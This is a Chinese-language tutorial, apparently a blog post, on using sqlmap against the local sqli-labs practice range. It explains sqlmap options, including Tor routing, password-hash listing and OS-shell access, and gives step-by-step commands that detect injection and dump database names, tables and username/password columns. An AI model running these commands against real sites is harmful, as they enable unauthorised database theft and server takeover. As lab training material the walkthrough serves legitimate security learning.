sqlmap sqli-labs

测试靶场:http://127.0.0.1/sqli-labs-master/Less-1/?id=5
sqlmap选项

目标:至少要选中一个参数
-u “URL”, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”)
-g GOOGLEDORK 将谷歌dork的结果作为目标url
请求:
这些选项可用于指定如何连接到目标URL
–data=DATA 数据字符串通过POST发送
–cookie=“COOKIE” HTTP Cookie的值
–random-agent 随机选择 HTTP User-Agent 头的值
–proxy=PROXY 使用代理去连接目标URL
–tor 使用匿名网络
–check-tor 检查Tor是否正确使用
注入:
这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本
-p TESTPARAMETER 可测试的参数
–dbms=DBMS 将后端DBMS强制到此值
检测:
这些选项可用于定制检测阶段
–level=LEVEL 执行的测试级别(1-5, 默认 1)
–risk=RISK 执行测试的风险 (1-3, 默认 1)
技术:
这些选项可用于调整特定SQL注入的测试的技术
–technique=TECH SQL注入技术选择 (默认 “BEUSTQ”)
枚举:
T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句
-a, --all 检索全部
-b, --banner 检索 banner
–current-user 检索当前用户
–current-db 检索当前数据库
–passwords 列出用户密码的hash值
–tables 列出表
–columns 列出字段
–schema 列出DBMS schema
–dump Dump DBMS数据库表的条目
–dump-all Dump 所有DBMS数据库表的条目
-D DB 指定数据库
-T TBL 指定表
-C COL 指定字段
操作系统访问:
这些选项可用于访问后端数据库管理系统底层操作系统
–os-shell 提示为交互式操作系统shell
–os-pwn 提示为OOB外壳,Meterpreter或VNC
通用:
这些选项可用于设置一些通用的工作参数
–batch 永远不要要求用户输入,使用默认行为
–flush-session 刷新当前目标的会话文件
杂项:
–sqlmap-shell 提示输入交互式sqlmap shell
–wizard 初学者的简单向导界面

一:sqlmap的使用

1.对url进行检测,判断是否存在SQL注入
sqlmap.py -u “url” --batch // --batch 永远不要要求用户输入,使用默认行为 url必须叫""引起来

sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=5" -batch

这里写图片描述

注入点:id 注入类型:blind盲注 数据库:mysql webserve:windows

2.获取数据库

 sqlmap.py -u url --dbs --batch    获取全部数据库

sqlmap.py -u url --current-dbs --batch  获取当前数据库

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=5 --dbs --batch


全部数据库

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=5 --current-db --batch

这里写图片描述
当前数据库

3 获取数据库中的表

sqlmap.py -u url -D DB --tables --batch

 sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=5 -D security --tables --batch

这里写图片描述
获取当前数据库security中的全部表

4.获取表中的列

sqlmap.py -u url -D DB -T TBL --columns --batch

 sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=5 -D security -T users --columns --batch

这里写图片描述

5.获取列中的数据

sqlmap.py -u url -D DB -T TBL -C COL --dump --batch  // --dump 获取列中的内容

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=5 -D security -T users -C "username,password" --dump --batch

这里写图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章